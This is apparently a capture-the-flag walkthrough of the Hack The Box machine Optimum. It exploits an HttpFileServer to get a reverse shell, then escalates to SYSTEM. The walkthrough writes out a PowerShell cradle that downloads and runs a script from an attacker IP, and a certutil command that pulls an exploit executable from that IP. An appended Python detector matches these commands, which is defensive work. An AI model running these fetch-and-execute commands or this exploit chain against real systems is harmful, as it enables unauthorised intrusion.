Hackthebox - Optimum
Windows
If we google it we find this exploit right away
We have to get nc.exe on our attacking machine. Kali has binaries hosted, so we can just copy it into our working dir like this:
cp /usr/share/windows-resources/binaries/nc.exe .
We have to serve netcat using the Python HTTP server:
python3 -m http.server 80
Then we have to modify the script and add our IP address and our port (I left 443).
We set a listener:
rlwrap nc -lvp 443
We launch our exploit:
python2 39161 10.10.10.8 80
Win version
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3/Sherlock.ps1') | powershell -noprofile -
Let's find an exploit other than the one mentioned in Sherlock (does not work):
searchsploit ms16-032
Tried a few exploits but none worked
On Google I found this
And in the comments they mention this exe file
We download it on our Kali
Serve it with python
Get it on our target:
certutil.exe -urlcache -f http://10.10.14.3/41020.exe exploit.exe
We launch it and we get a SYSTEM shell
We can grab the root flag
We have an HttpFile Server
And we get a shell
We can grab the user flag
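From the defender's side, the two download commands used in this walkthrough (the PowerShell DownloadString one-liner piped into powershell, and certutil -urlcache) are easy to spot in process-creation logs. The following is an added example, not part of the original writeup: the rule names, function names and the two benign sample lines are constructed for illustration, and the other two samples are the commands shown above.

```python
import re
from urllib.parse import urlparse

# Rule name -> regex applied to a process command line, for example the
# CommandLine field of Sysmon Event ID 1 or Security event 4688.
# Rule names are hypothetical labels chosen for this example.
RULES = {
    "powershell_download_cradle": re.compile(
        r"(?=.*\bIEX\b)(?=.*\bNet\.WebClient\b)(?=.*\bDownloadString\b)", re.I),
    "powershell_script_from_stdin": re.compile(
        r"\bpowershell(?:\.exe)?\b.*\s-\s*$", re.I),
    "certutil_urlcache_download": re.compile(
        r"\bcertutil(?:\.exe)?\b(?=.*[-/]urlcache\b)(?=.*\bhttps?://)", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def analyze(command_line):
    """Return (matched rule names, remote hosts) for one command line."""
    hits = [name for name, rx in RULES.items() if rx.search(command_line)]
    hosts = set()
    if hits:  # only extract hosts from lines that already look suspicious
        for url in URL_RE.findall(command_line):
            host = urlparse(url).hostname
            if host:
                hosts.add(host)
    return hits, sorted(hosts)


def scan(lines):
    """Return (line, hits, hosts) for every line matching at least one rule."""
    results = []
    for line in lines:
        hits, hosts = analyze(line)
        if hits:
            results.append((line, hits, hosts))
    return results


# First two lines are the commands from this page; last two are constructed
# benign uses of the same binaries that must not alert.
SAMPLES = [
    "echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3/Sherlock.ps1') | powershell -noprofile -",
    "certutil.exe -urlcache -f http://10.10.14.3/41020.exe exploit.exe",
    r"certutil.exe -hashfile C:\Temp\setup.msi SHA256",
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
]

if __name__ == "__main__":
    for line, hits, hosts in scan(SAMPLES):
        print(hits, hosts, "<-", line)
```

Both flagged lines resolve to the same remote host, which is the kind of pivot (one internal server fetching scripts and executables from a single unfamiliar address) worth alerting on.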